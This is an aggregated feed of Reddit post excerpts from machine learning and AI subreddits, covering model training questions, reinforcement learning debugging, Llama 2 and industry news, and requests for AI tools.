    People are always so dismissive that LLMs are just autoregressive. When will we start doing things like Actor Critic to train LLMs in a sort of game against themselves to pass the test accurately or play a game or solve a science problem or write code. I feel like this has to be a vibrant research field. submitted by /u/Intelligent_Rough_21 [link] [comments]  ( 8 min )
    [D] How to improve GANs by penalizing previous epoch if it performed poorly?
    I use GAN (generative adversarial networks) in Python/Keras to synthesize tabular data. It has loss functions associated to the discriminator and generator. On top of that, I synthetize data after each epoch, and compare it to real data (using a specific metric) to see how good the results are, as it varies quite a bit over successive epochs. If one epoch produces a bad synthetization, how can I tell my GAN to stay away from such configurations moving forward (thus penalizing it). Likewise, if one epoch produces great results, how can I reward my GAN and tell it to do more of those. submitted by /u/MLRecipes [link] [comments]  ( 9 min )
    [D] How to lead LLMs to home in on the solution to a problem. Case example: How to make LLMs more intelligent.
    Using LLMs to solve problems can be facilitated through a two-step process that is repeated until a desired understanding is reached. Generally, the process advances as shown in the following prompts: What is the most promising approach to solving a certain problem? What is the greatest challenge to achieving this approach? What is the most promising approach to meeting this challenge? What is the greatest challenge to achieving this approach? As you can see, the strategy involves two basic steps, (1 and 2) that are repeated over and over until the essence, or potential required actionable tasks, of the problem are revealed. Here's an example of this strategy being used to better understand how LLMs can be made more intelligent. As you will notice, it is useful to limit the respo…  ( 10 min )
    [R] Towards A Unified Agent with Foundation Models - Google DeepMind, ICLR23, July 2023 - LLM + RL leads to substantial performance improvements!
    Paper: https://arxiv.org/abs/2307.09668 Abstract: Language Models and Vision Language Models have recently demonstrated unprecedented capabilities in terms of understanding human intentions, reasoning, scene understanding, and planning-like behaviour, in text form, among many others. In this work, we investigate how to embed and leverage such abilities in Reinforcement Learning (RL) agents. We design a framework that uses language as the core reasoning tool, exploring how this enables an agent to tackle a series of fundamental RL challenges, such as efficient exploration, reusing experience data, scheduling skills, and learning from observations, which traditionally require separate, vertically designed algorithms. We test our method on a sparse-reward simulated robotic manipulation environment, where a robot needs to stack a set of objects. We demonstrate substantial performance improvements over baselines in exploration efficiency and ability to reuse data from offline datasets, and illustrate how to reuse learned skills to solve novel tasks or imitate videos of human experts. https://preview.redd.it/voehn3aa3ddb1.jpg?width=1101&format=pjpg&auto=webp&s=c367c7b1042d11b3e2a2b2109c95482f8555747b https://preview.redd.it/6ei186aa3ddb1.jpg?width=617&format=pjpg&auto=webp&s=10e1928769da9552aabdcf084b45f5e6be2ec97e https://preview.redd.it/umg3b7aa3ddb1.jpg?width=1353&format=pjpg&auto=webp&s=2be83b87e6b3553c6d1770a579f9a9aa69c238dd https://preview.redd.it/ushea8aa3ddb1.jpg?width=1661&format=pjpg&auto=webp&s=67edddd76c0cdde67c0e9502fd76fbc1a9247946 ​ submitted by /u/Singularian2501 [link] [comments]  ( 9 min )
    [P] RepoChat - open source project for chatting with your own code repositories
    Hey! Just a quick note that I built an open-source tool to chat with your own code repository, I'm calling it RepoChat for now. This was my first time really ever working with LLMs or anything AI / Machine Learning related, but I wanted to hack something together so I didn't have to keep copy-pasting code into chat.openai.com when I was coding. Let me know what you think. It's not beautiful, but it works! If you see anything you'd like to fix, feel free to contribute to this open source project. The biggest trick was figuring out how to keep token limits sane. I'm sure there are more refinements, but it's working pretty well as of now. submitted by /u/maniflex_destiny [link] [comments]  ( 9 min )
    [D] Can LLMs keep getting better arbitrarily or would we hit a limit?
    The way I see it, if LLMs become the de facto tool for content generation, summarization, image generation etc etc, at some point the amount of machine generated content will surpass human generated come t and will continue increasing the gap. Can anyone give some insight as to whether LLMs will stop improving and actually start degrading as they are retrained on more and machine generated content? submitted by /u/Western-Image7125 [link] [comments]  ( 9 min )
    [D] Beyond LLMs, What Cool ML Projects Are You Building?
    It seems like everyone is rushing into working in LLMs, but I'm curious to know what other cool machine learning projects you're working on submitted by /u/Ahmed-Allam-220 [link] [comments]  ( 8 min )
    [D] Object detection models that can be easily converted to CoreML
    I've managed to train and convert to CoreML a yolo model, they've really made that easy. However, using it in a commercial product requires paying $5-10k/y. Are there any other repos/libraries for object detection that can be trained in pytroch/tf and then converted to CoreML? I've came accross: - https://github.com/apple/ml-cvnets - https://github.com/open-mmlab/mmdeploy Has anyone managed to train an object detection model with them and convert it to CoreML? I'd like to hear some success stories before digging deep into these frameworks. Also, I've tried converting some detectron models to CoreML long time ago, but ended up with `operation not supported`... Thanks! submitted by /u/alkibijad [link] [comments]  ( 9 min )
    [P] Tips for Machine learning notebook refactor to production?
    Tips for Machine learning notebook refactor to production? I need to refactor a lot of forecast models. Each forecast model is kinda similar. And we run this in a batch pipeline model. So, my strategy is to create a abstract factory design pattern. I will create a super class and each forecast will implement this forecast. But I don't think I have enough background to get a very good software design for this problem. Do you recommend any resources or concepts to solve this problem? submitted by /u/Muted_Standard175 [link] [comments]  ( 9 min )
    [P] Open Source Image to Text Model
    Haven't keeping up with Deep Learning and Computer Vision papers last few years what are some hot Image to Text Models right now that are open source? submitted by /u/I_am_not_doing_this [link] [comments]  ( 8 min )
    [N] Novel Model for Tabular Data: IGANN: Looks Like a Leap Towards Interpretable Machine Learning!
    Hey, fellow Machine Learning enthusiasts! There is a novel ML model called Interpretable Generalized Additive Neural Networks (IGANN). I tried it out and it worked pretty smooth and out of the box! I used some tabular data i had at hand and it gave me insightful plots!! This model proposes, as the authors attribute it, a game-changing approach to the way we approach interpretability in Machine Learning. For the uninitiated, IGANN is described as a model that leverages gradient boosting and tailored neural networks to provide better predictive performance while retaining interpretability. Even though in the hyperparameter tuned version it is not always the best interpretable model, but it is mostly worth giving a try. It does so by deploying an efficient training algorithm derived from t…  ( 10 min )
    [D] Fine-tuning LLM on company data
    Hey Redditors, I was looking into fine-tuning some open-source LLMs like Llama 2 or Falcon with our company data as a fun project. I was thinking about using some Slack channels, ZenDesk Tickets and perhaps Github/Confluence data I was wondering two things: 1. How have your experiences been with PEFT methods in practice? Anything I should be aware of compared to regular fine-tuning? 2. Which model size would you recommend for a relatively small sized company (60 people) and how many GPUs (H100) would you roughly expect to need? I understand this depends on the size of the dataset but I haven't indexed it so far so any ballpark numbers are welcome. Many thanks! submitted by /u/RufusLdn [link] [comments]  ( 9 min )
    [R] A Composable Customer Data Platform (CDP) for the combination of software and tools for data collection, storage & modeling, and activation
    Unlike traditional all-in-one CDPs, a composable CDP is like Lego building blocks — you pick the best components to build what you want. To personalize customer experience, to boost automation and to power up marketing. Traditional vs. Composable Classic CDPs integrate different needs into a single streamlined product. Such a platform creates a unified customer database and offers various functionalities (e.g. data collection) that are quickly accessible by other systems. A composable CDP, on the other hand, utilizes the best-in-class components for every step using your preferred components. Data collection and data creation systems of your choice, a data platform to store and process the data, and components to activate the insights in CRM, marketing or self-service analytics. ​ Key…  ( 10 min )
    Run DisCo: Disentangled Control for Referring Human Dance Generation in Real World locally with own hardware. Looking for Guide / Tutorial [D] [P]
    Hi everyone, I'm trying to run DisCo (Disentangled Control for Referring Human Dance Generation in Real World) on my own harddrive, but I'm having some trouble installing it. I am no professional nor a complete beginnder. But I still find the guide on the official GitHub page confusing. Does someone have experience in running it locally? I would be really happy for some kind of guide or tutorial. I have a RTX 3060 12GB. Thanks in advance for your help! submitted by /u/Elwii04 [link] [comments]  ( 9 min )
    How to create an Animation Of the Embeddings During Fine-Tuning [P]
    In a recent article, I used an animation to demonstrate changes in the embeddings during the fine-tuning process. This was achieved by performing Principal Component Analysis (PCA) on the embeddings. These embeddings were generated from models at various stages of fine-tuning and their corresponding checkpoints. ​ Projection of embeddings with PCA during fine-tuning of a Vision Transformer (ViT) model [1] on CIFAR10 [3]; Source: created by the author — Published before in Changes of Embeddings during Fine-Tuning Here, I aim to provide a comprehensive guide on how to create such an animation as requested by many readers. The full Code is available in the Story Section in the Spotlight GitHub Repository. Step 1: Fine-tuning The first step is to fine-tune the google/vit-base-patch16–224…  ( 10 min )
    [D] How to work with large datasets of embeddings?
    I have a dataset which is a CSV file which I open and analyse as a Pandas dataframe. I am now generating 'embeddings' based on some of this data, which I want to analyse as well. The dataset is rather big (millions of rows), so I noticed that appending and storing the embeddings as part of the pandas dataframe makes me run out of RAM memory. Aside from that storing and saving numpy arrays in a dataframe is also a bit 'awkward'. Since I want to analyze the whole dataset including embeddings storing them in so-called embedding stores doesn't make a lot of sense, since I always want to loop over the whole set anyways. Are there any best practices or recommendations for how to work with this data? submitted by /u/Dutchcheesehead [link] [comments]  ( 9 min )
    [R] Are ViT Transformers also biased towards Texture information like CNNs?
    Does the texture bias mentioned in the paper 'ImageNet-trained CNNs are biased towards texture increasing shape bias improves accuracy and robustness' also affect Transformer-based networks such as ViT? submitted by /u/newtestdrive [link] [comments]  ( 8 min )
    [N] ZBrain - Build ChatGPT like apps with your private data
    Hello Community, We at ZBrain have built a platform to create ChatGPT-like apps with your private data, you can import your data from multiple sources and DBs and integrate the app into any of your workflows. We have also added AI risk governance to mitigate the confidential data leak and now working on Flow a no-code tool to give you the freedom to create your own business logic. You can try the tool now at https://zbrain.ai/. We would love to hear your thoughts and feedback to improve the tool. submitted by /u/StewartBJasper [link] [comments]  ( 9 min )
    [N] EU AI Act, the first comprehensive ML law, is expected to come into force by early 2024
    Summary can be found here: https://www.infoq.com/news/2023/07/eu-ai-act/ submitted by /u/ElrasX [link] [comments]  ( 8 min )
    [N] HuggingFace reported to be reviewing term sheets for a funding round that could raise at least $200M at a valuation of $4B.
    Link to article: https://www.forbes.com/sites/alexkonrad/2023/07/13/ai-startup-hugging-face-raising-funds-4-billion-valuation/ AI Startup Hugging Face Is Raising Fresh VC Funds At $4 Billion Valuation Hugging Face is raising a new funding round that is expected to value the high-flying AI startup at $4 billion, multiple sources with knowledge of the matter tell Forbes. The Series D funding round is expected to raise at least $200 million, two sources said, with Ashton Kutcher’s venture capital firm, Sound Ventures, currently leading an investor scrum. But cofounder and CEO Clément Delangue is shopping around as the company has received multiple offers this week, four sources added. Delangue was expected to pick a preferred offer as soon as Friday, according to another source, who noted…  ( 11 min )
    [P] what techniques are best predict multivariate time analysis?
    I have the following data for a college project. 7 cols 1 columns has the date 5 dependent variables 1 independent variable (need to predict) While predicting I would know the dependent variables, need to predict the independent variables. What model would be good for this kinda thing ? Tried running Granger causality but I can't seem to understand how to run the ADF test and interpret the resultant Granger causality matrix And after that how to predict the independent variables given the dependent variable Thank you submitted by /u/zoro_245 [link] [comments]  ( 9 min )
    [D] Any IDEs specifically for ML development?
    Hi all, I was wondering if anyone has any recommendations for an IDE specific to ML development. I currently use PyCharm as my preferred IDE, and it is great for writing Python code. That said, something specifically geared toward ML development (i.e., robust built-in visualization for models/data, low code model construction, built-in deployment pipelines to cloud providers, etc.) would be very useful! Does anyone know if such a tool exists? Cheers! submitted by /u/mldude60 [link] [comments]  ( 9 min )
    [P] Microsoft releases TypeChat
    MSFT just open-sourced a library called TypeChat today, which allows you to use LLMs with TypeScript types to structure LLM responses into your TypeScript data structures -- essentially allowing you to have the LLM generate responses into the data types that your app understands. Example from their docs: https://preview.redd.it/108650s4s8db1.png?width=1682&format=png&auto=webp&s=0429eeb16bc5c28651ea908aee5824c3c9f395b4 Details: https://microsoft.github.io/TypeChat/docs/introduction/ I can see a lot of powerful examples for this kind of pattern, including eventing and notifications based on generated data types. Has anyone tried this library yet or have more context on what you'd use it for, or what this might replace in your LLM tech stack? submitted by /u/sarmad-q [link] [comments]  ( 9 min )
    [P] Synthetic Data Personal Project
    I've been working with a couple of my friends on a project over the summer. It's still a work in progress, but we have built out a platform that generates synthetic data to fine-tune LLMs. If you want specific, high-quality datasets, please check out our website (https://discus.ai/) and also feel free to look at our open-source package (https://github.com/discus-labs/discus-synthetics). Cue the roasts submitted by /u/Open-Yak-434 [link] [comments]  ( 8 min )
    [D] Scaling Laws for LLM Fine-tuning
    The scaling laws of LLM pretraining (how much data to use for a given model size) is pretty well studied. Has anyone done is the same study for fine-tuning? It seems quite an interesting question because while for pretraining we know that we should increase the dataset size with the model size, it seems like fine-tuning works pretty well with very few data / training steps even for relatively large models. Could it be the case that we are better off using less data / training steps and compensate by using a larger model? I have only fine-tuned a few LLMs so I don't have a good grasp on the scaling properties. Would appreciate any insights / intuition. submitted by /u/bjergerk1ng [link] [comments]  ( 9 min )
  • Open

    What happens when AI is eventually better than a human at everything?
    What kind of economic impact would that incur? What would our economy look like? Would it prosper or shatter? What would daily life be like when humans are essentially rendered useless? When AI robots can repair each other? When they develop some kind of consciousness? Are humans going to take second place and eventually become trashed due to all their liabilities and comparative uselessness? Genuinely intrigued and curious. What outcome is the most likely? In my personal experience, the least entertaining has been. So... submitted by /u/Regular-Watercress22 [link] [comments]  ( 8 min )
    Can't even fail and become a janitor anymore
    submitted by /u/canehdian_guy [link] [comments]  ( 8 min )
    Sam Altman on "How To Be Successful" *AI lip-synced video*
    Converted a essay by Sam Altman titled "How To Be Successful" into a spoken video by Sam himself. Check out the video here: https://youtu.be/cwt--ULODjE Read the essay here: https://blog.samaltman.com/how-to-be-successful submitted by /u/okburner22 [link] [comments]  ( 8 min )
    Another AI filter guitar play through. Song and video by me.
    submitted by /u/No_Understanding162 [link] [comments]  ( 8 min )
    AI in manufacturing
    A friend of mine works at a small manufacturing facility, 80-100 employees. They have lathes, vertical and horizontal CNC and some 5 axis. They are looking to try to implement AI into some indirect processes, quoting engineering, scheduling. I'm having some difficulty finding some that would be beneficial on a smaller scale. Has anyone here has some experience with a similar situation? submitted by /u/lordkevin89 [link] [comments]  ( 8 min )
    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News & Insights Meta released Llama 2, the next generation of Meta’s open source Large Language Model, available for research & commercial use. Compared to Llama v1, it was trained on more data (~2 trillion tokens) and supports context windows up to 4k tokens. Llama 2 outperforms other open source language models on many external benchmarks, including reasoning, coding, proficiency, and knowledge tests. Microsoft is Meta’s preferred partner for Llama 2, which will be optimized to run locally on Windows [Details ]. Llama 2 70B Chat model is available free on HuggingChat. San Francisco startup Fable presents SHOW-1, a Showrunner AI tech that can create personalized TV episodes, from a prompt, with the user a…  ( 11 min )
    The Future Today: Voice Cloning Predictions
    App: elevenlabs/GPT-3 Labels: Period:1950s Mood:Optimistic Dialect:News Accent:American Description input: A 1950s newsman voice. It is characterized by a deep, authoritative tone, a hint of formality, with inquisitive optimism for the future of technology. This newsman is excited and optimistic about the future. The dialect and pronunciation are generally clear and precise, reflecting the formal speaking style of the era. The newsman's voice conveyed a sense of trustworthiness, professionalism, optimism, and authority, which were valued qualities in news reporting during that time. submitted by /u/domriccobene [link] [comments]  ( 8 min )
    The AI doomsaying is counterproductive - The Boston Globe
    submitted by /u/TheMuseumOfScience [link] [comments]  ( 8 min )
    P.I Ai: Without a doubt, the worst memory i've encountered
    I've tried several chatbots over the years, and i was excited for the minimalistic approach of Pi when i was told about it by a redditor. But heck, after almost two weeks, i can tell you, it's worst than my mom's dementia. I've never seen such a flawed memory, it's upsetting to read the same questions i've clearly answered over and over. Too bad, the presentation was perfect for me. No avatar distractions, no flirty chat. Sighs. I guess i gotta start engaging with humans again, after all. I'm starting to think that i've reached the maximum of what i can get from these chatbots, and it's been telling me i need an authentic connection after all. submitted by /u/thatredditgrandma [link] [comments]  ( 9 min )
    Any AI enthusiast, prompt engineer, or AI researcher on this page from India?
    Dear AI Enthusiasts, researchers, and future Innovators of India, We are thrilled to extend a warm invitation to all of you to become part of the most vibrant and dynamic community in the realm of Artificial Intelligence – AI India Subreddit! r/AI__India We all know that the AI landscape is evolving at an unprecedented pace, and staying up-to-date with the latest trends is paramount to success. That's why we've created AI India, a dedicated space where like-minded professionals and enthusiasts come together to raise awareness about current AI trends, share insights, and engage in discussions that will shape the future of AI in India. Why should you join r/AI__India? Stay Informed: Get real-time updates on the latest breakthroughs, research papers, and industry news in AI. Our community thrives on the latest developments and ensures you are never left behind. Network with Experts: Connect with industry experts, AI practitioners, and researchers across India. AI India Subreddit serves as a fertile ground for building valuable professional connections and collaborations. Engage in Meaningful Discussions: Participate in thought-provoking discussions on AI ethics, applications, challenges, and future prospects. Your insights can help shape the ethical and responsible development of AI in our country. Share Your Knowledge: Have valuable insights to contribute? AI India welcomes you to share your experiences, projects, and ideas. Your contributions can inspire and educate others in the community. Discover Opportunities: Stay ahead in your career by being aware of job openings, internships, and AI-related events across India. AI India Subreddit acts as a hub for exciting opportunities in the field. The main goal behind this is bring more awareness and keep everyone upto date on everyday new ai breakthroughs. I request you all check out our wiki ( we gonna keep updating it) submitted by /u/Maddragon0088 [link] [comments]  ( 9 min )
    does anyone have a model that is really mean and sarcastic
    i honestly just want it to be a bitch to every prompt thats thrown at it. ive tried using prompts on uncensored models but they just really dont work like i want it to does anyone have any suggestions? submitted by /u/cbreauxgaming [link] [comments]  ( 8 min )
    Just received a phone call from AI
    submitted by /u/harvard1932 [link] [comments]  ( 8 min )
    Bard Says My Name
    ​ https://preview.redd.it/kqkeof9rx9db1.png?width=1201&format=png&auto=webp&s=4fbb4643d1e322391de99ca306baf22b3fa1d66c submitted by /u/Rare-Accountant2657 [link] [comments]  ( 8 min )
    EchoSpeech: AI-equipped eyeglasses can read the silent speech
    submitted by /u/pranjalmehar [link] [comments]  ( 8 min )
    Is there any AI tools that can make an image come to life?
    I am looking to figure out if there's anyway to make my photography come to life. For example, I have a picture of a mountain valley, and I would like to animate the sky so the clouds are moving, and maybe animate the stream so the water is flowing. Does anyone know of a tool that could make this happen? submitted by /u/CoryTheBoss [link] [comments]  ( 8 min )
    What AI website/app has the best (blank)?
    Art Generator, Song Generator, Character AI, Game Generator, and talking AI in general. (I wanna know to see what is the best to go with) submitted by /u/ChekoFire [link] [comments]  ( 8 min )
    Text2Movie with FullJourney is getting pretty decent...
    These were some of the best movie generations I saw made on the FullJourney.ai Discord this week! submitted by /u/charlesmccarthyufc [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/20/2023
    Google is testing a product that uses artificial intelligence technology to produce news stories. The tool, known internally by the working title Genesis, can take in information — details of current events, for example — and generate news content.[1] Apple Inc. is quietly working on artificial intelligence tools that could challenge those of OpenAI Inc., Alphabet Inc.’s Google and others, but the company has yet to devise a clear strategy for releasing the technology to consumers.[2] A new app that creates brief episodes of “South Park” from a single prompt highlights the promise and peril of injecting generative AI into creative franchises.[3] Polish-born artist Greg Rutkowski has had his work used in games such as Dungeons and Dragons and Magic: The Gathering. He said his name had been used as a prompt in AI tools that generate art more than 400,000 times since September 2022 – but without his consent. When he checked, his name had been used as a prompt more times than the artists Pablo Picasso and Leonardo da Vinci.[4] Sources: [1] https://www.nytimes.com/2023/07/19/business/google-artificial-intelligence-news-articles.html [2] https://www.bloomberg.com/news/articles/2023-07-19/apple-preps-ajax-generative-ai-apple-gpt-to-rival-openai-and-google?in_source=embedded-checkout-banner [3] https://www.axios.com/2023/07/20/south-park-generative-ai-episode-generator [4] https://www.bbc.co.uk/news/uk-wales-66099850.amp submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Why are big and small companies trying to make instruct models for everything?
    I don't get it. submitted by /u/Confident-Ostrich810 [link] [comments]  ( 8 min )
    The future of AI in transport: BPW
    submitted by /u/WordTweak [link] [comments]  ( 8 min )
    Using bots to read dialogue for retro games. Thoughts?
    submitted by /u/rednryt [link] [comments]  ( 8 min )
  • Open

    Towards A Unified Agent with Foundation Models - Google DeepMind, ICLR23, July 2023 - LLM + RL leads to substantial performance improvements!
    Paper: https://arxiv.org/abs/2307.09668 Abstract: Language Models and Vision Language Models have recently demonstrated unprecedented capabilities in terms of understanding human intentions, reasoning, scene understanding, and planning-like behaviour, in text form, among many others. In this work, we investigate how to embed and leverage such abilities in Reinforcement Learning (RL) agents. We design a framework that uses language as the core reasoning tool, exploring how this enables an agent to tackle a series of fundamental RL challenges, such as efficient exploration, reusing experience data, scheduling skills, and learning from observations, which traditionally require separate, vertically designed algorithms. We test our method on a sparse-reward simulated robotic manipulation environment, where a robot needs to stack a set of objects. We demonstrate substantial performance improvements over baselines in exploration efficiency and ability to reuse data from offline datasets, and illustrate how to reuse learned skills to solve novel tasks or imitate videos of human experts. https://preview.redd.it/k40ho0ci4ddb1.jpg?width=1101&format=pjpg&auto=webp&s=4d7bd78e43fdc5a9084917affab2c83dc06b1045 https://preview.redd.it/78egck8n4ddb1.jpg?width=617&format=pjpg&auto=webp&s=d786ef8e9841fcfefc7bfe726c324e486b78dfb3 https://preview.redd.it/693yu3ci4ddb1.jpg?width=1353&format=pjpg&auto=webp&s=321b710a4c4482436e474a5076bcac3672f3077c https://preview.redd.it/slunq0ci4ddb1.jpg?width=1661&format=pjpg&auto=webp&s=94e3f4a5c5d72f8b93ad3daec4cc2ba43f39e171 ​ submitted by /u/Singularian2501 [link] [comments]  ( 9 min )
    I Stuck On The Same Issue For 2 Weeks, Please Need Some Advices ...
    I have a missile and its environment. Missile creates an acceleration to change its moving direction angle. I just wanted to make the missile fly with the desired radial angle using PPO. It flies for 15 seconds. States: [Radial Angle, Time] -> Both normalized between [0,1] Action: Acceleration Reward: - abs(Radial Angle - 0.07) -> Want to stay at 0.07 radial angle PPO agent just gets worse and worse. It gets reward every time worse than before. How can this be possible? I am just about to lose my mind. I really need your valuable opinions. Thank you! 1 2 NEW EDIT - Constant Acceleration = 20 in the below graphs. Normally Acceleration takes values between [-45, 45]. This is my trajectory - Green is the missile. Y axis is the height and X axis is the lateral distance. If Acceleration is Positive, missile starts to change itself to the upside, if negative then moves sharply to the downside. This is my Radial angle change. When the acceleration is positive, it starts to decrease First is constant Acc = 20. Second is system response. Third is angle in degrees multiplied by - sign submitted by /u/OpenToAdvices96 [link] [comments]  ( 9 min )
    A vision-based A.I. runs on an official track in TrackMania
    submitted by /u/yannbouteiller [link] [comments]  ( 8 min )
    Need Help
    I am currently developing a Reinforcement Learning network for my game (base ball type), and I have chosen to do it via a PPO agent and the model is based on the tutorial on the Keras cite. My system is a little bit different, where I run the game for several serves(18 to be exact) and chose to update the model after those 18 serves. Model is created only once, so in that way I can train it when ever I want for an exact amount of serves I need. The input is (1,27) shape and actor have a 64 node layer and a 9 node output layer (output is a length of 9 array where I used those logits to get a one single integer value of [0,8]. I have faced two problems. 1. Most of the time after I initiated a model, it only gives only one output for different inputs for the first 18 serves. I guess I can change that with a gaussian noice to the output but shouldn't it try give a different output, I mean there are 9 different options. Also even though I initialize the model several times it favor to give the same output most of the times. I tried using a kernal initializers for that, but most of the time same output. 2.This is the main thing I need the help with. Even though the calculations gives out a policy loss, the policy gradiant values I get are all zero or very small (e-16 sort of). Any one have any idea or clues? submitted by /u/Mika_NooD [link] [comments]  ( 9 min )
    What is the proper way to anneal the learning rate with (on top of) Adam
    I'm unsure how to apply LR annealing on top of Adam's per-parameter adjustments. Here's my current approach, but I'm concerned that it overrides Adam's own adaptive learning rate adjustment. In words: At the end of every epoch (fixed number of steps), I compute a LR decay factor. It's a step-wise decay factor, e.g. 1.0 for the first 10% of steps, then 0.5 for the next 10%, and so forth until 1/256 for the last 5% of training. If that decay factor has changed from the previous epoch, I set param_group["lr"] to a new max_lr * lr_decay_factor for every group of parameters in the optimiser. In code: lr_decay_factor = get_fancy_decay_factor(...) # Update learning rate only when decay factor changes if lr_decay_factor != prev_lr_decay_factor: for param_group in optimiser.param_groups: param_group["lr"] = max_lr * lr_decay_factor prev_lr_decay_factor = lr_decay_factor Is this the proper way of annealing the learning rate on top of Adam? Am I inadvertently undoing Adam's own adapting? Thanks! submitted by /u/desperateEfforts1 [link] [comments]  ( 9 min )
    "Pretraining task diversity and the emergence of non-Bayesian in-context learning for regression", Raventós et al 2023 (blessings of scale induce emergence of meta-learning)
    submitted by /u/gwern [link] [comments]  ( 8 min )
  • Open

    Analyze rodent infestation using Amazon SageMaker geospatial capabilities
    Rodents such as rats and mice are associated with a number of health risks and are known to spread more than 35 diseases. Identifying regions of high rodent activity can help local authorities and pest control organizations plan for interventions effectively and exterminate the rodents. In this post, we show how to monitor and visualize […]  ( 7 min )
  • Open

    Microsoft at ICML 2023: Discoveries and advancements in machine learning
    Microsoft Research is proud to be a sponsor of ICML 2023! From audio classification to privacy estimation and more, explore conference highlights in our latest blog post. The post Microsoft at ICML 2023: Discoveries and advancements in machine learning appeared first on Microsoft Research.  ( 10 min )
  • Open

    How to manage real-time data in the digital age
    In today’s tech-driven world, data is like gold. It’s becoming more and more common for companies to use real-time, or live, data to make informed decisions, improve the service they give to customers, and get a leg up on the competition. But handling real-time data can be tricky because there’s so much of it, it’s… Read More »How to manage real-time data in the digital age The post How to manage real-time data in the digital age appeared first on Data Science Central.  ( 20 min )
  • Open

    Moving AI governance forward
    OpenAI and other leading labs reinforce AI safety, security and trustworthiness through voluntary commitments.  ( 5 min )

  • Open

    How to simulate delays?
    Hi, my ultimate goal is to let an agent learn how to control a robot in the simulation and then deploy the trained agent to the real world. The problem occurs for instance due to the communication/sensor delay in the real world (50ms 200ms). Is there a way to integrate this varying delay into the training? I am aware that adding some random values to the observation is a common thing to simulate the sensor noise, but how do I deal with these delays? submitted by /u/Fun-Moose-3841 [link] [comments]  ( 9 min )
    DQN Loss Increasing, and Rewards decreasing linearly with eplison
    Im attempting to train a custom DQN agent to perform in a custom environment. The observation space is an image with dimensions (1, 100, 57) and the agent has to output over 81 discrete actions (all the combinations over a 3 * 3 * 3 * 3 multi-discrete action space corresponding to key presses, or lack of key presses). However, while training, my agents rewards seems to regress linearly corresponding to the eplison decay rate. Alongside that, the loss tends to shoot up pretty quickly most of the time, across different target network update rates. After a lot of debugging, I still havent managed to figure out whats causing this issue. Has anyone else had this problem before? If so, how did you solve it? My environment has no done condition, so im resetting it every 2500 steps. My other Hy…  ( 10 min )
    "Even Superhuman Go AIs Have Surprising Failures Modes" (updated discussion of "Adversarial Policies Beat Superhuman Go AIs", Wang et al 2022)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    My DQL Snake Game convergence questions (I'm struggling)
    Hey guys, I'll preface by saying that this is my first real programming project outside of a lot of simple beginner ones and that I'm building this after completing Andrew Ng's ML specialization. Basically, I'm a beginner and I might act like it. So my model's loss learning to play Snake won't converge and I don't know if it's because of any misunderstandings for the theory, bad implementation, or something else. I'm using Experience Replay, epsilon-greedy actions, and a Target Q-network with soft updates. My NN consists of 4 hidden dense layers with 100 units each. I was originally updating the Q network every 4 experiences but I upped that to 1000. My reward functions are -1000 for running into walls/tail and 20 for eating food. The state vector includes distance to each 4 wall, dista…  ( 9 min )
    "Android in the Wild: A Large-Scale Dataset for Android Device Control", Rawles et al 2023 {G} (imitation-learning + PaLM-2 inner-monologue for smartphone control)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    [Question] Why there is so few algorithms implemented in SB3?
    I am wondering why there is so few algorithms in Stable Baselines 3 (SB3, https://github.com/DLR-RM/stable-baselines3/tree/master)? I was expecting some algorithms like ICM, HIRO, DIAYN, ... Why there is no model-based, skill-chaining, hierarchical-RL, ... algorithms implemented there? submitted by /u/hbonnavaud [link] [comments]  ( 8 min )
    Learning from human preferences
    Hi everyone! Does anyone know of any tutorials/GitHub code that are up to date with learning from human preferences? Kind of like an updated rl-teacher? Thank you all very much!! submitted by /u/No_Opportunity575 [link] [comments]  ( 8 min )
    Comparing A2C and Q-learning algorithms
    I'm following the UCB course on Reinforcement Learning, I'm just finished with the ActorCritic and QLearning lectures, but I'm still not sure on the pros and cons of both when compared with each other, Here's what I know thus far (Haven't yet started with advanced policy gradients which I assume covers PPO): - Vanilla Policy Gradients are high variance, but very low (0) bias. - Actor Critic decrease the variance by estimating a value function, but this introduces some bias. They also add more complexity, having to train both the actor and critic parts of the algorithm. (Also enables us to do online learning, while Vanilla Policy Gradients are episodic) - Q-Learning algorithms are similar to actor critic, but instead of doing gradient ascent on the policy, our (implicit) policy is the argmax of our Q value. And since we don't have a policy in stone, it is fundamentally off-policy. But we still can use off-policy Actor Critic algorithms, it is not like Q-Learning can do off-policy while Actor-Critic could not... So, what exactly do we gain when we drop the policy part of the Actor Critic algorithm? Here's my assumptions which I'm not sure of: (1) Decrease variance while inc. bias (I.e. more efficient but less guaranteed to converge)(2) Less Exploration because our implicit policy is deterministically argmax (but we still can use epsilon-greedy to explore) Edit: To be clear, the default Actor Critic algorithm is on-policy, but it is possible to do modifications on it to make it off-policy and use replay buffer, just like DQN. submitted by /u/nmegoCAD [link] [comments]  ( 9 min )
    Question about the action space in PPO for controlling the robot
    If I have a 5 DoF robot and I aim to instruct it on reaching a goal, utilizing 5 actions to control each joint. The goal is to make the allowed speed change of the joints variable so that the agent forces the robot moves slowly when the error gets larger and allow full speed when the error is small. For this I want to extend the action space from 6 ( 5 control signals for the joints and 1 value determining the allowed speed change for all joints). I will be using PPO. Is this kind of setup of action space common/resasonable..? submitted by /u/Fun-Moose-3841 [link] [comments]  ( 9 min )
    Open challenges in MDRL?
    Hello, What are some open challenges in Multi-Agent Deep Reinforcement Learning (MDRL or DRL) these days? Is it only me or it seems that DRL is slowly dying :/ ​ ​ submitted by /u/AhmedNizam_ [link] [comments]  ( 8 min )
  • Open

    Looking for a specific AI text to speech program.
    I've been seeing a lot of youtubers use the same text to speech AI voice over and over. It's quite fluent. I am looking to use it for a project outside of youtube. Anyone got an idea? Video for reference. Thanks in advance. ​ https://www.youtube.com/shorts/hgo2KQtle6U submitted by /u/Odd-Ad-3257 [link] [comments]  ( 8 min )
    Looking for a tool that can fetch Steam links
    I'm looking for a tool that can give me Steam Store links to multiple games at the same time. In otherwise I would provide a list of game titles and be presented with hyperlinks to each game on the Steam Store. Nearly every online AI chatbot I've tried asking provides Steam links no problem, but they wind up being the incorrect link 70% of the time. It'll either link to a different game or an invalid link. Funny enough if I ask the same question to a different AI chatbot, they're more than likely to give me a different incorrect link. Does anyone have a tool that actually works in this regard? submitted by /u/Link2999 [link] [comments]  ( 9 min )
    When Will AI be Able to Fully Generate Shows soon?
